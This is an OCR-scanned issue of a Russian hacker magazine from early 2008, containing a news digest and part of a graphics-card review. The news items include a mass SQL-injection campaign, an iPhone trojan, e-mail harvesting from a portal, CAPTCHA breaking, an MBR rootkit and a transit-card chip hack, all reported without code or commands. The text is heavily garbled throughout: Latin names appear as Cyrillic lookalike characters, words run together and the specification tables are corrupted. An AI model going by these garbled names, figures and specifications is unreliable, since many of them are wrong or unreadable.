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ПОЧТА НАХАКЕР.Ки 

ТОЛЬКО САМЫЕ ВЕРНЫЕ ЧИТАТЕЛИ ][ ЗНАЮТ, ПОЧЕМУ У 
ВСЕЙ РЕДАКЦИИ ПОЧТОВЫЕ АДРЕСА НАХОДЯТСЯ В СТРАН- 
НОМ ДОМЕНЕ РЕАЬ.ХАКЕР.РІІ. НИ У КОГО ИЗ НАС НЕТ НЕ- 
ОБУЗДАННОЙ СТРАСТИ К ДЛИННЫМ И НЕУДОБНЫМ ДО- 
МЕНАМ, НИКТО ИЗ НАС НЕ СЧИТАЕТ, ЧТО ПРИСТАВКА РЕАІ_ 
ДЕЛАЕТ ХАКЕРА КРУЧЕ, ДА И МАНИЕЙ ВЕЛИЧИЯ СТРАДАЮТ 
ДАЛЕКО НЕ ВСЕ. 

Объяснение на поверхности: лет пять назад у нас был проект народной ][- 
почты, и каждый читатель могзавести себе ящик в домене хакер. ги. Позже 
по ряду серьезныхдлятого времени причин этотпроектзагнулся, нов нази- 
дание осталасьэта славная традиция с доменом геаі. хакер. ги, который был 
создан, чтобы редакционные ящики как-то отличались от читательских. 

К чему я все это пишу? Да просто мы опять запустили почтовый сервис на 
хакер. ги, причем теперь есть все основания полагать, что навсегда. При со- 
здании сервиса мы рассудили здраво: круче боодіе Маіі все равно никому 
ничего не сделать, поэтому мы договорились с Гуглом, и теперь народная 
хакерская почта крутится на их серверах и движке. Стало быть, о качестве 
работы, сохранности писем и безопасности своих логов можешь не беспоко- 
иться. Заходи на ѵѵѵѵѵѵ.хакер.ги и регистрируй себе крутую хакерскую почту. 
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Обо всем за последний месяц 



По сообщению ІпіЪгтагіопѴѴеек в период с 28 декабря 2007 года 
по 5 января 2008 года с помощью ЗрЬ-іщесйоп взломано 70000 сайтов. 




Вирус для іРИопе 



Вот и для Арріе іРЬопе написали первую вредоносную программу. Как 
обычно бываете продуктами Арріе, устанавливать всякихтроянцев прихо- 
дится самим. Программа называется ІРЬопе бгтѵѵаге 1 .1 .3 ргер, и, чтобы 
«заразиться» ей, необходимо подключить соответствующий репозиторий в 
Іпзіаііег и скачать ее оттуда. В описании указано, что программа подгото- 
вит смартфон для установки на него новой прошивки 1.1.3, которая натот 
моментеще не вышла. После установки и запуска на экран беспорядочно 
выводится слово «ВЬоез» и больше ничего не происходит. Но при удалении 
программа забираете собой файлы из корневой папки /Ьіп, в которой 
хранятся настройки многих сторонних программ. Избавиться оттрояна 
можно очень незамысловатым способом — перед удалением нужно просто 
скопировать всю папку /Ьіп в надежное место, а потом вернуть обратно. О 
том, что яблофон уязвим для вирусов, говорить пока сложно, но все подряд 
уста на вливать тоже не стоит. 



Киберглаз не за горами 

Группа ученыхуниверситета Вашингтона, возглавляемая профессором 
Бабаком Парвизом, создала контактные линзы, которые могут выводить в 
глаз владельца различные изображения. Чтобы впихнуть микросхемы и 
источники света в линзы и те не отторгались глазом, пришлось придумы- 
вать новуютехнологию, позволяющую совмещать металлические провод- 
ники толщиной всего в несколько нанометров и светодиоды с попереч- 
ником втреть миллиметра с материалами линз. Суть технологи и втом, 
что создается набор деталей, каждая из которых обладаеттакой формой, 
что вся микросхема воедино может собраться только одним-единствен- 
ным образом. Набор столь мелких частиц представляетсобой порошок, 
который рассыпают на поверхность пластика, и за счет капиллярных 
сил между компонентами схема сама собой собирается. Вокругзрачка 
человека достаточно места, что разместить там различные устройства, 
которые не будут мешать зрению. В ближайшее время ученые собираются 
внедрить в линзы устройства беспроводной связи и полупрозрачный 
экран с маленьким разрешением. 
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Іор4іор пополняет 
спамерскиебазы 

Замечательный портал 1ор4іор.ги, которым практически 
невозможно нормально пользоваться из-за его ужасного 
интерфейса, также плохо заботится и о сохранности личной 
информации своих пользователей. Два блоггера — реЗус и 
щііу — обнаружили возможность выуживания адресов элек- 
тронной почты из всех зарегистрированных аккаунтов. Для 
этого понадобилось написать программу, состоящую всего 
из шести строчек кода. Даже если пользовательудалитсвой 
акк на портале, данные о нем все равно не будут полностью 
уничтожены и легко попадут в базы с помощью этой програм- 
мы. Это уже не первый случай проблем с безопасностью — за 
несколько дней до опубликования возможности тырить емей- 
лы блоггер карізоѵ заявил, что пароли у всех ѴІР-пользова- 
телей портала, включая Дмитрия Диброва и Тину Канделаки, 
заменены 1 23456. Через некоторое время админы опомнились 
и поменяли все обратно. Несмотря на многомиллионные 
вложения, портал пока вызываеттолько насмешки и придирки 
к внешнему виду и содержанию. 




В январе наступила 

1200000000-я секунда с начала 

отсчета ІЛііх Тітезііатр 




В Германии посадят всех 

Новые поправки к закону об авторском праве вступили в действие на территории 
Германии. Теперь в тюрьму можно попасть за то, что наверняка делал хоть раз в своей 
жизни практически каждый пользователь компьютера. Копия диска, сделанная 
несмотря на защиту от копирования, теперь имеетофициальный статус пиратской, и 
за ее производство светит 5 лет в местах не столь отдаленных. Тем более такие диски 
нельзя распространять. Но это еще не самое интересное — если простой житель 
Германии сделает любительский ролик, как он с друзьями пьет пиво под популярные 
музыкальные мотивы, и выложит его в своем блоге, то ему тоже будет грозить тюрем- 
ное заключение. На использование любого музыкального произведения, которое 
прозвучало во время ролика, придется купить права в немецкой организации бета, 
которая позаботится, чтобы твои кровные дошли до авторов музыки. Также уголовным 
преступлением теперь признано скачивание фильмов и музыки из интернета. Вот 
такая борьба с пиратством. 



Немецкий игрок в "ѴѴОГІСІ ОІѴѴЭ.ГСГЗ.И накопил рекордную сумму денег — 

214 748 золотых, 36 серебряных и 48 медных монет. В переводе на реальные деньги 
это составляет порядка $6500 



И снова в суд 

Компания МісгозоЙ опять втянута в судебные разбирательства по поводу монополии. 

На этотраз Еврокомиссия будет разруливать вопрос законности включения Іпіегпеі 
Ехріогег в операционку. Поводом для разбирательств стали жалобы производителя кон- 
курирующего браузера Орега на то, что якобы включение браузера в ОС ставит конкурен- 
тов в неравное положение. Помимо этого будут рассмотрены вопросы, связанные ОШсе 
2007: ставится под сомнение его совместимость с конкурирующими продуктами, и есть 
подозрение, что мелкософтовцы утаивают информацию о своих продуктах от конкурен- 
тов, тем самым не давая им делать офисные системы, которые нормально работали бы с 
микрософтовскими форматами. Это уже не первый схожий процесс — в прошлый раз под 
раздачу попал ѴѴіпсІоѵѵз Месііа Ріауег. В результате МісгозоЛ обязали внести изменения 
в плейер и выплатить штраф в размере 497 миллионов евро. С тех пор прошло почти 
4 года, а МісгозоЙ: все оспариваетэто решение, так и не выплатив штраф. Посмотрим, 
какая сумма набежит в этот раз. 
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1. Соберите армию, вызовите флот 
и позвоните на канал Оізсоѵегу. 

Они всё знают. Они могут атаковать 
с воздуха и взять ситуацию под 
контроль, но потом проблемы будут 
и у вас, и у них. На них работают 
лучшие ученые, они владеют 
последними разработками, 
созданными как раз для таких целей. 
Может, они вам и помогут. 



2 . Украдите ключи от их корабля. 

Звучит безумно, но должно сработать. Когда они поймут, 
что застряли здесь, возможно, решат расслабиться 
и отдохнуть от завоеваний. 



1. Внедрите МісгозоЙ Роге^гопС 

Защищать вашу систему станет еще проще. 
Новое семейство продуктов информационной 
безопасности, включающее защиту периметра, 
клиентов и серверов (например, Рогеітопі Бесигііу 
Рог ЕхсНапде Бегѵег), просто интегрировать 
и использовать. Рогеітопі поможет предупредить 
все угрозы безопасности проще, чем когда-либо. 
Чтобы узнать, как Рогеітопі: помог защитить систему 
международного аэропорта Вены, посетите 
ѵѵѵѵѵѵ.ргохЬергозіодо.ги 



3. Чихайте на них. 

Иммунная система пришельцев 
отличается от нашей. 

Значит, даже обычный насморк 
может стать для них смертельным. 
Чихайте и кашляйте в их сторону, 
плюйтесь во время разговора - 
даже если с иммунитетом 
у них все в порядке, они могут 
обидеться на грубость и улететь. 



4 . Попробуйте договориться. (Или не пробуйте.) 

Может, они и не пришли к нам с миром, но все-таки 
это высокоразвитые существа. Представьте, что они 
ваши клиенты, и продайте им идею, что человечество 
нужно беречь. Покажите презентацию на 50 слайдов, 
а затем заключите сделку. Или просто хватайте их 
за ноги и раскручивайте, пока не закружится голова. 



5 . Заморочьте им голову, 
а потом - бегите. 

Пришельцы не знают, кто тут главный. 
Скажите им, что на Земле правят белки, 
а люди - их покорные рабы. 

И пока они будут вести переговоры 
с белками, убегайте и прячьтесь. 



МіСГОЗОІТ 



Рогеітопі: 



Ваши способности. Наше вдохновение. 

Місгозоіі 



отразить вторжение отразить атаку хакеров, 
инопланетян, просто. проще простого. 



Реклама 






47 % американцев хотят быть ] 

- 21 % — хотят быть Владимиром Путиным. 



эШИНСТБ 



іенных 




Мобильная клавиатура 



Многие любители фильмов, особенно если они скачивают их из 
торрентов, чтобы не заморачивать себя записыванием болванок, 
да и вообще покупкой ОѴО-проигрывателя, подключаютсвой комп 
к широкоформатному телеку. Однако тут возникает проблема: чтобы 
банально поставить фильм на паузу, нужно встать с дивана и переться 
к компу. Больше повезло тем, у кого беспроводные клавиатуры, но все 
равно сидеть на диване с полноразмерной клавой в руках не 
очень здорово. Специально для решения этой проблемы 
компания БодіІесЬ разработала мини-клавиатуру сііЫоѵо 
Міпі, которая создана для управления развлекательной 
системой на базе ПК. Клавиатура беспроводная, с компом 
общается посредством ВІиеІооіН 2.0. Помимо обычных 
клавиш на ней присутствуют мультимедиа-кнопки (пауза, вперед, 
назад) и панель СІіскРасІ. Чтобы проще было управляться в темной 
комнате клава, оснащена цветной подсветкой. Кроме просмотра 
фильмов с таким девайсом удобно серфить и нет с дивана на большом 
экране, общаться в аське и вообще развлекаться. Стоимость устройства 
составляет€149,99. 





Одноклассники- 

самозванцы 

С ростом популярности интернет-портала обпокіаззпікі.ги в нем появ- 
ляется все больше желающих выдать себя за других людей. Набираешь 
в поиске фамилию и имя какой-нибудь известной личности и получаешь 
порядка двухсот различных анкет, подлинность которых весьма сомни- 
тельна. Многиетаким раскладом очень недовольны, особенно Евгений 
Чичваркин, совладелец компании «Евросеть». Его настолько раздражает 
наличие самозванцев, которые нетолько используютего личные данные и 
фотографии, но и осмеливаются вести переписку отего имени с пользо- 
вателями ресурса, что он решил разобраться с этой ситуацией в судебном 
порядке. Однако владельцы портала обпокІавБпікі.ги подчеркивают, что 
любой человек может попросить удалить анкеты самозванцев с сайта, и это 
будет сделано в максимально короткие сроки. Кроме Чичваркина наличием 
левой страницы на «Одноклассниках» возмущался телеведущий Владимир 
Соловьев, после чего лже-ан кета была удалена администрацией сайта. 
Проведя небольшой эксперимент, я установил, что больше всего анкету 
Жанны Фриске — большеЗО. АЧичваркина нетвообще... 



► 008 
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Чернее черного 

Американскиеученые создали самый черный материал в 
мире. Материал состоит изуглеродныхтрубок и поглощает 
более 99,9% света. Новый материал на 30% темнее, чем эталон 
черного, ранее используемый американским Национальным 
институтом стандартов и технологий. Руководитель проекта 
Пуликел Аджаян (Риііскеі Аіауап) говорит, что весьсветтолько 
поглощается, это разрушает представление о том, сколько 
света способен поглотить материал. Отражательный индекс 
у нового материала составляет 0,045%. Материал предпола- 
гается использовать при превращении солнечной энергии. 
Пока был протестирован только видимый световой диапазон, 
в котором материалом поглощаются все цвета. Далее ученые 
собираются выяснить, как материал будет себя вести при 
воздействии ультрафиолета, инфракрасных волн и радиации. 
Учитывая любовь многих ктехнике абсолютно черного цвета, 
стоило бы позаботиться о создании более дешевого варианта 



Какты заметил, на большинстве сайтов для определения того, кто производит дейс- 
твие: человек или компьютер, предлагают ввести цифры с картинки. Это называется 
САРТСНА (Сотріеіеіу Аиіотаіесі РиЫісТигіпд ІезИо Іеіі Сотриіегз а псі Нитапз Арагі), 
то есть автоматизированный публичный тестТьюринга для различения компьютеров 
и людей. Многие хацкеры пытаются написать такую программу, которая бы смогла 
распознать капчу. На основе такой проги можно смастерить бота, который будет осу- 
ществлять массовые рассылки, сканировать базы порталов типа ѵкопіакіе.ги и делать 
прочие гадости. О создании такой программы сообщил ~ІоЬп ѴѴапе, который является 
автором блога Ыеіѵѵогк Бесигііу РезеагсЬ. Их группа создала алгоритм, который с 
вероятностью 35% проходит капчу на порталах УаЬоо. Самим ѴаЬоо об этом сообщили, 
но никто ничего не ответил. Программа позволяет массово регистрировать адреса 
электронной почты, писать кучи сообщений в блогах и т.д. Состоит программа из двух 
частей — клиентская забирает картинку с сайта, а серверная ее расшифровывает. 





САРТСНА не катит 



61 % 



пользователей интерне: 



не меняет пароль. 



Бразилия против Контры 

Бразильские власти непонятными методами выяснили, что игры 
Соипіег-Бігіке и Еѵегциезі: провоцируют насилие и вредят здоровью 
игроков, и с легкой руки ввели запрет на эти гамесы по всей стране. 
Почему при этом в понимании бразильских властей не вредят здоровью 
и не провоцируют насилие другие игры, остается загадкой. Теперь все 
жители должны в обязательном порядке удалить эти игры с компов, 
иначе придется выплачивать штраф в три штукаря баксов аж каждый 
день. Запрет на игрухи был утвержден еще в октябре прошлого года, но 
его введение было отложено. Судья Карлош Альберт Симоеш отметил, 
что Соипіег-Вігіке и Еѵегциезі «провоцируют нарушение обществен- 
ного порядка и представляют собой угрозу для демократического госу- 
дарства, закона и общественной безопасности». Воттак все серьезно. 
Уже начался арест всех копий этих игр и облавы по компьютерным 
клубам с целью конфискации дисков и удаления их с компьютеров. 
Владельцы клубов очень недовольны, поскольку игры они покупали 
лицензионные и теперь несут большие убытки. Компания Еіесігопіс Агіз 
ждет официального судебного извещения, чтобы начать разбираться с 
проблемой. 
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Самые 

уязвимые 

Институт 5АЫ5 (БузАсітіп, Аисііі, Ыеіѵѵогк, Эесигку) ежегод- 
но публикует отчеты о самых уязвимых продуктах. Этот год 
не стал исключением, и вотсписок 10 самых небезопасных 
приложений: 

1. Іпіегпеі Ехріогег. У Ослика проблемы сАсбѵеХ. 

2. Могіііа Рігеіюх. Много ошибок, позволяющих выполнять 
произвольный код. Оперативно лечатся апдейтами, но не все 
их ставят. 

3. АбоЬе АсгоЬаІ Веабег. Много уязвимостей, приводящих к 
выполнению произвольного кода и замусориванию памяти. 
Плагин кІЕи Рігеіюх оказался тоже с дыркой. 

4. Місгозоіі ОІІісе всех версий. Чемпион по уязвимостям среди 
офисных программ. 

5. Місгозоіі Оиііоок Ехргезз, Оиііоок, Ѵізіа ѴѴіпсІоѵѵз Маіі. Хитро 
подготовленное письмо позволяет выполнять произвольный 
код. 

в. Могіііа ТЬипбегЬігб. По уязвимостям обходит даже ОиНоок. 

7. Еибога. Три уязвимости, одна из которых до сих пор не 
устранена. 

8. РеаІРІауег. Три уязвимости: отйо5 до выполнения произ- 
вольного кода. 

9. Арріе іТипез. Одна ошибка. Выполнение произвольного 
кода. 

Ю.АбоЬе РІазЬ Ріауег. Две ошибки. 



п 



оменнаязона 



еодолела отметку в 



і шштша 

1 млн 



имен 



Планшеты 

вместо 

учебников 

Министерство образования Южной Кореи запус- 
тило проект, в ходе которого в школах обычные 
бумажные учебники заменят планшетами, 
оснащенными большим сенсорным экраном, 
встроенной памятью и беспроводным модулем 
связи. РІачнутсучеников младших классов, ко- 
торые с таких устройств смогут не только читать, 
но и смотреть видео, делать пометки, получать 
задание прямо с компьютера преподавателя и 
отправлять ему обратно готовое решение. Через 
1 -2 года планируется выпустить новую версию 
устройства с более чувствительным сенсорным 
экраном, который позволит писать на нем с такой 
же скоростью и комфортом, как и в обычной тет- 
ради. Тогда уже можно будет полностью отказать- 
ся от бумажных носителей информации в рамках 
образовательного процесса. В данный момент 
корейцы усиленно разрабатывают электронные 
версии учебников, и уже к 201 1 году планируется 
перевести на такие устройства всех учащихся 
Южной Кореи. Интересно, научатся ли их ломать, 
чтобы на контрольной работе тихонько скачивать 
решение у ботаников. 
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Резкий руткит 

Компания Эутапіес объявила об обнаружении 
нового руткита, работа которого принципиально 
отличается от всех известных до этого вредонос- 
ных программ и не определяется антивирусами. 
Идея состоит в том, чтобы заменять главный 
загрузочный сектор (тазіег Ьооі гесогсі) и 
загружаться раньше операционной системы. Это 
возможно, потому что именно в МВН хранится 
информация отом, какая ОС грузится после ВІ05. 
Вирус стал распространяться с декабря прошло- 
го года и уже заразил несколько тысяч машин. 
Зутапіес также сообщает о нескольких сайтах, 
через которые идет распространение руткита. 
Несмотря на то что вирус начинает грузиться до 
ОС, работает он только с Окнами ХР. Руководитель 
антивирусного подразделения Эутапіес Оливер 
Фридрихтак комментируетобнаружение нового 
руткита: «Обычно руткиты устанавливаются как 
драйверы, также, каки другое ПО. Они загру- 
жаются вместе с ОС, но этот руткит производит 
загрузку раньше операционной системы. Этот 
новый метод атаки позволяет взять под полный 
контроль ПКжертвы». 



іяшкі 8шіі 
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МуБС^Ь АВгаі$1 млрд* 



Чипованные 

преступники 



Электронный проездной 
поломали еще до выхода 




В Нидерландах с 2009 года плани- 
руется ввести новые билеты для 
общественного транспорта, которые 
заряжены электронными чипами 
Мйаге, обеспечивающими защиту от 
взлома. Но на съезде хакеров в Бер- 
лине немецкие взломщики показали 
своим коллегам из Нидерландов, 
как с помощью аппарата стоимос- 
тью менее 1 00 евро можно делать с 
чипом все что угодно. В результате 
любой желающий сможетобеспе- 
читьсебя пожизненным бесплатным 
билетом на все виды транспорта. 
Компания ЫХР, создавшая чип, 
занимается выяснением возмож- 
ных последствий. У компании есть 
также более защищенная, но и более 
дорогая версия чипа, но в случае ее 
реализации непонятно, кто покроет 
эти новые расходы. Однако даже 
более защищенный чип наверняка 
не сможет на 100% гарантировать 
защиту. С нетерпением будем ждать 
появления новой породы зайцев, 
которые не прячутся от кондуктора, 
а с гордым видом ходятс пожизнен- 
ным билетом. 



Власти Великобритании планируют вживлять преступникам под 
кожу микрочипы, которые будут контролировать их передвиже- 
ния. Это позволит освободить место втюрьмах, атакже следить 
за порядком в них. Капсула, в которой находится чип, антенна и 
устройство передачи информации, будет вживляться под кожу 
руки, и ее, какзаверяютсоздатели капсулы, будет практичес- 
ки невозможно извлечь самостоятельно. На чипе разместят 
информацию о личности преступника, его правонарушениях и 
т.п. Подобныеустройствауже вживляют домашним животным, 
чтобы разыскать их в случае побега отхозяев, а также кладут в 
багаж, чтобы при потере или краже быстро его найти. Утехноло- 
гии есть и противники, которые утверждают, что сигнал с чипа 
можно легко скопировать или заглушить. Но больше всего они 
опасаются, что такие чипызафигачатвообще всем гражданам 
Великобритании. Домашнихживотных им, значит, нежалко, а 
вотза людей беспокоятся. 
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Самая популярная социальная 
сеть — МуБрасе. Ее доля 

составляет 76 , 3 %. На 

втором месте РасеЬоок с 

12 , 6 %. 



Седьмые Окна 



Фокус с мобилой 



Компания І_6 представила новый телефон Ѵіеѵѵіу (КЕ990), отли- 
чительной особенностью которого является пятимегапиксель- 
ная камера с функцией ручной фокусировки и стабилиза- 
тором изображения. Какзаявляется, камера может 
делать качественные фотографии в условиях 
низкой освещенности и снимать видео 
с частотой 1 20 кадров в секунду. 
Полученные фотографии 
можно редактировать 
встроенным софтом, а 
широкий трехдюймовый 
сенсорный экран позволит 
просмотреть не только гото- 
вые снимки, но и ОіѵХ-видео в 
полноэкранном режиме. Втеле- 
фон также встроен готовый интерфейс 
для работы с порталом УоиТиЬе. Только ѴѴі-Рі 
нет, поэтому, зачем этот УоиТиЬе нужен, не совсем 
понятно. Телефон ест карты памяти МісгоБО объемом 
до 2 Гб.такчто места для фотокхватит. Единственная про- 
блема в том, что телефон этотуж очень похож на фотоаппарат. 
Шуток со стороны товарищей, что ты перепутал и взял вместо 
телефона что-то не то, не избежать. 



Билл Гейтс пророчит, что через 
10 лет беспроводной интернет накроет 
весь земной шар. 



** V 



ъыа 



Сстрѵіег 






МэдюСгліеі 



Очередная версия операционки от МісгозоІІ под кодовым именем 
ѴѴіпсіоѵѵб 7 или Ѵіеппа может выйти аж на полгода раньше срока. Запуск 
был запланирован на 201 0 год, но это счастье ожидается уже во второй 
половине 2009-го. Первая предварительная версия уже роздана парт- 
нерам мел ко мягких для тестов. Как я уже писал в одном из прошлых 
номеров, новая Винда будет основана на ядре МіпѴѴіп, очень маленьком 
и быстром. Из особых вкусностей нам обещают поддержку технологии 



МиШТоисИ, причем выглядеть все будет круче, чем в продукции Арріе. 
Тестовая версия Мііезіопе 1 поставляется в двух вариантах: для 32- и 
64-битных платформ. Продавать ОС планируют в двух редакциях: для 
домашних пользователей и для корпораций. Но, думаю, к началу про- 
даж, как всегда, наворотят десяток непонятных версий. Столь скорый 
выход новой ОС объясняют тем, что Висту не та к радужно приняли, как 
ожидали разработчики, и что производители компьютеров оказывают 
некоторое давление на МісгозоТС. 



► 012 
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Скоростная 

поддержка 

Про службу технической поддержки М іеговой: 
говорят много хорошего и много плохого, но одно 
можно сказать точно: количество обращений в 
нее очень большое. Поэтому сотрудники саппорта 
не всегда успеваютоперативно отвечать на все 
вопросы. Но представь себе удивление парня, 
получившего ответ на свою заявку ровно через 
10 лет! Причинойтакой «задержки» стал простой 
человеческий фактор. 7 января 1998 года поль- 
зователь позвонил в службу поддержки и описал 
свою проблему. Оператор, оформляя заявку на 
компе, собирался поставить дату следующего 
дня, чтобы кто-то изтехнических специалистов 
связался с пользователем по поводу его пробле- 
мы, однако вместо 8/1/98 набрал 8/1/08. Звонок 
с опозданием на Юлетвызвал у пользователя 
некоторое замешательство, и ему потребовалось 
довольно много времени, чтобы вспомнить, что 
это было у него 1 0 лет назад. Хорошо еще, что не на 
100 лет опечатались, это пришлосьбы с внуками 
разговаривать... 




В УоиТи 



мшт9,5 миллиардов іші 
138 миллионам ишпяпзпяіт зя 



еогюликов, просматриваемых онлайн 



Ноутбук как бритва 

На прошедшей в Сан-Франциско выставке МасѴѴогІсІ 2008 наиболее 
ярким событием было представление нового ноутбука Арріе МасВоок 
Аіг, который является самым тонким ноутом в мире на сегодняшний день. 
Его толщина в самом широком месте составляет 1 ,94 см. Стиву Джобсу 
удалось договориться с компанией Іпіеі, и они создали уменьшенную, 
но не урезанную версию процессора ІпІеІСоге 2 йио. Также у ноутбука на 
борту 2 гига оперативки, видеокарта ІпІеІХЗІ 00 и 1 ,8-дюймовым жесткий 
диск емкостью в 80 Гб (за небольшую доплату в 999 долларов предлагается 



64-гиговый 550-диск). Монитору ноута имеет диагональ 13,3 дюйма и раз- 
решение 1280x800. В целях экономии места у ноутбука отсутствует привод 
ОѴО и всего три порта: один 115В 2.0, Місго-ОѴІ и аналоговый аудиовыход. 
Предполагается, что ноут будет общаться с внешним миром исключительно 
через ѴѴі-Рі и ВІиеІооіЬ. Из других особенностей стоит отметить, что корпус 
у ноутбука алюминиевый, а клавиатура оснащена подсветкой. Стоимость 
бука составляет 1 799 долларов за начальную модель, а внешний ОѴО-при- 
вод с питанием от 118В обойдется еще в 99 баксов. 
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КИРИЛЛ АВРОРИН 



^ Т>ггит 



ЕСТИРОВАНИЕ НЕСТАНДАРТНЫХ ВИДЕОПЛАТ 



ПОСЛЕДНЕГО ПОКОЛЕНИЯ 



Поводов для сегодняшнего теста набралось достаточно. Во-первых, на рынке появилось 
немало интересных решений среднего класса как от 1МѴГОІА, так и от ее старинного канад- 
ского конкурента АТІ, находящегося, правда, уже под мускулистым крылышком АМО. Также 
в первых тестах и исследованиях выяснилось, что новички, обладая весьма соблазнительной 
ценой, не стесняются раздавать пинки флагманам линейки! В довершение всего мы решили 
взять не совсем простые карточки, а те, в профиль которых производитель внес некоторые 
изменения. Кардинально картину они, конечно, не поменяют, но заядлому игроку или ком- 
пьютерному энтузиасту определенно стоит обратить на них внимание ! 



Н МЕТОДИКАТЕСТИРОВАНИЯ 

Графические адаптеры тестировались в штатном режиме в разрешениях 
1 024x768 и 1 280x1 024. В списоктестовых приложений вошли популярные 
игрушки: Сгузіз, 5.Т.А.І_.К.Е.В., ІІпгеаІТоигпатепІ 3, атакже тестовый па- 
кетЗОтагк’Об с патчем версии 1 .02. В качестве операционной системы 
была выбрана ѴѴіпсіоѵѵзХР Ргоі'еззіопаі 5Р2, так как в среде Ѵізіа до сих 



пор не слишком корректно работают бенчмарки, что снижает достовер 
ность результатов тестов. 

Также мы скачивали из интернета последние версии драйверов, а все 
тесты проходили с включенной анизотропной фильтрацией (XI 6) и 
антиализингом (Х4). 



|1^м^ъ^6^іМ024Жіпд5<огШурегХРРК2-800| 




ТЕ5Т_ЬАВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТАВИ- 
ТЕЛЬСТВАМ КОМПАНИЙ АМР-АТІ, А5Ц5, ЕС5, М51, 5АРРНІВЕ И ХРХ 



► 014 
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аррЫге Вагіеоп Нй 3870 



аррЫге Васіеоп НР 3850 






$260 



$379 



Цодб ВОВѵн^З вЩие : РѴ670 
Количество процессоров: 320 
Чйстрщр'а'бртьшІ^гГа 1 670 МГц 
Частота' ра.боты памяти: іббоМГц 
Тип памяти: 600КЗ 

памяти: 256 Мб 

Разрядность шины памяти: 256 бит 
Техпроцесс: 55 нм 

•••••••ООО 



М&дѳв бё:цаз'ва нйй : РѴ670 
Количество процессоров 320 

МГЦ 

-Чаетрта р'а ббтыішамятй 1 2250 МГЦ 
Тип памяти: 60ЭК4 
Щъём 'памяти : 512 Мб 
Разрядность .ши н ьмп ам яти 1 2^б|іі; 
Техпроцесс: 55 нм 
•••••••ООО 




«Третье» поколение Расіеоп Нб на самом делетехнически не сильно отли- 
чается от плат серии 2ХХХ. Используются почти те же самые компоненты, 
только процессор производится по более совершенномутехпроцессу. В 
этом плане инженеры АТІ даже обогнали конкурентов из ЫѴЮІА, которые на 
данный момент не могут преодолеть процесс в 65 нм. Примерно таким же 
образом поступила ІЧѴЮІА, выпустив чип 692, который применяется в пла- 
тах серии беРогсе 88006Т, за счетчего они показывают столь интересные 
результаты. Но, какуже упоминалось выше, техпроцесс чипа 692 составля- 
ет65 нм, а ВѴ670 — 55 нм. Теоретически потенциал этой карточки выше, но 
за количество кадров в секунду отвечает не только техпроцесс, но и память, 
сам процессор и многое другое. 

Но вернемся к нашей Васіеоп НО3850. Весьма привлекательно выглядит 
ее официальная цена — 199 долларов. Но на момент написания этих строк 
карточки по цене ниже 230 долларов в продаже не встречались. Учитывая, что 
разница между официальной ценой беРогсе 88006Т и ее реальной стоимос- 
тью в рознице составляет еще больше, это вполне объяснимо. Дарить быстрые 
карточки, когда можно получить дополнительную прибыль, никто не будет. 

0 

Не обошлось без проблемы перегрева: карточка слишком сильно нагревается, 
и в целом мы не можем назвать систему охлаждения эффективной. Ктомуже 
некоторая часть теплого воздуха выдувается внутрь корпуса, что не есть плюс. 




Топовая плата излинейки Васіеоп НбЗХХХ от«придворного» производите- 
ля видеоплат АТІ — компании баррЫге. Какобычно, баррЫге выпустила ка- 
чественную, технологичную, но не отличающуюся технически от референс- 
карты плату. Модель основана на том же чипе ВѴ670, но обладает более 
высокими частотами и большим объемом памяти, бграничений на память 
для этих модификаций не существует, поэтому в продаже можно встретить 
версии совершенно разного объема: от 256 Мб до 1024 Мб. При покупке все 
же логичнее обращать внимание на тактовую частоту и время задержки 
памяти, нежели на ее объем. Мы практически уверены, что 768 Мб 
с меньшими частотами покажет результаты хуже, чем наша плата со стан- 
дартными параметрами, сертифицированными АТІ. 

Столь значительная разница в частотах между Васіеоп Нб 3850 и 3870 
обусловлена типом используемой памяти: в этом случае производитель 
предпочел 600В4, куда более лояльную к работе на высоких частотах. Чип 
также тактирован на 100 МГц выше, что весьма немалое отличие. 

0 

И опять не все ладно с системой охлаждения. Крупный ребристый радиатор 
издает немало шума при охлаждении и выводе теплого воздуха за пределы 
корпуса. Но сама система работает вполне достойно: громоздкий корпус 
скрываеттурбину, плата занимает два слота на внешней стороне корпуса. 




Никак не получается у Васіеоп Нб 3870 опередить беРогсе 8800 6Т! Факт АТІ Васіеоп Нб 2900 ХТ еще что-то может! Ветеран успешно отбивает атаки 

остается фактом: новенький беРогсе быстрее в подавляющем большинстве молодняка 

тестов 
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Технические характеристики: , 



(&до воё.нэзва н ѵ и е : 6^2 
ш ичество процессоров: 112 
сто^ар'йботьі' я ѵіііі а 1 680 М Гц 
Частота работы памяти: 2000 МГц 
Тип памяти: СййГіЗ 
Объем памяти: 512 Мб 
Ь^МЙЫДдИммішияЛІ :аіІШЙІ 
ИШЩзЦДЬ Оі^4м 
•••••••••О 
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М5І ЫХ8800Уига-Т20768Е-НО-ОС 



Технические характеристики: 

Кодовое название 680 
Количество процессоров: и 
Частота работы чипа: 660 МГц 
Ча стота работы памяти: 2300 МГц 
Тип памяти: 600КЗ 
Объем памяти: 768 Мб 
Разрядность шины памяти: 384 бит 
Техпроцесс: 90 нм 




$790 



Крайне оригинальная плата отобычно скромной компании Еіііедгоир. За 
основу взята штатная беРогсе 8800 6Т, а на нее смонтирована система 
охлаждения Ассеіего 51 от Агсбс Сооііпд. Громоздкая штуковина увеличила 
размеры платы до внушительных 220x1 00x33 мм. Сама система охлаждения 
состоитиз нескольких алюминиевых радиаторов, соединенных медными 
тепловыми трубками. Схема в принципе классическая, но удивляетто, что 
никак не охлаждаются чипы памяти. 

В целом в плюсы этой плате мы однозначно записываем безупречную про- 
изводительность, отличныетехнические параметры и очень демократич- 
ную цену. При условии, что стакими параметрами она фактически кладет на 
лопатки большую часть участи и ко в теста, она заслуженно получает награду 
«Лучшая покупка». Так как никаких проблем в процессе работы обнаружено 
не было, оценку даже при всем желании снизить не удастся. Такой вот нын- 
че пошел «наглый» средний класс — при невысокой цене готов уничтожить 
даже своих старших собратьев. 

Ѳ 

Несмотря на стабильную работу, данные термотеста нас ужаснули. В 
штатном режиме работы при длительной игре, то есть когда процессор 
и память загружены по полной, температура чипа составила 94 градуса! 
Признаться, в нашей лаборатории даже в оверклокерскихтестах платы не 
всегда греются до такихтемператур. Здесьже мы имеем дело с совершенно 
штатной моделью. 




Большой и толстый ветеран отЫѴЮІА. Как ни крути, но даже новомодный 
беРогсе 88006Т на чипсете 692 не может побороть монструозный беРогсе 
